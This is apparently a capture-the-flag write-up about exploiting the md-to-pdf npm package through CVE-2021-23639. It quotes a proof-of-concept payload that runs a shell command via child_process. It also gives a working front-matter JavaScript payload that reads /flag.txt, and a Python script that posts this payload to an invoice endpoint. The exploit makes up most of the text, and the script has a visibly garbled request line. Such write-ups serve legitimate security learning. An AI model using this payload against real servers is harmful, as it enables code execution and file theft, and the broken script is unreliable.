This turned out to be a really quick challenge. After downloading the code and googling for exploits on the NPM packages I
found that md-to-pdf
was vulnerable to a RCE exploit CVE-2021-23639.
I tried a couple of versions of the ---jsn((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE
payload that's
mentioned in different POCs, but I couldn't get it to work. Then I found this github issue
that shows a different way of writing the exploit.
This turned out to work 👇
css: `body::before { content: "${require('fs').readFileSync('/flag.txt')}"; display: block }`,
import requests
host = "" # Host to attack
url = host + "/api/invoice/add"
payload = "---js\n{\n css: `body::before { content: \"${require('fs').readFileSync('/flag.txt')}\"; display: block }`,\n}\n---" # Be very careful, a slight syntax error will cause the exploit to fail.
json = {"markdown_content": payload}
res1 =,json=json)
if res1.status_code != 200:
print("Explpoit failed Status Code - ", res1.status_code)
print("Exploit worked, visit - " + host + " and view latest Invoice")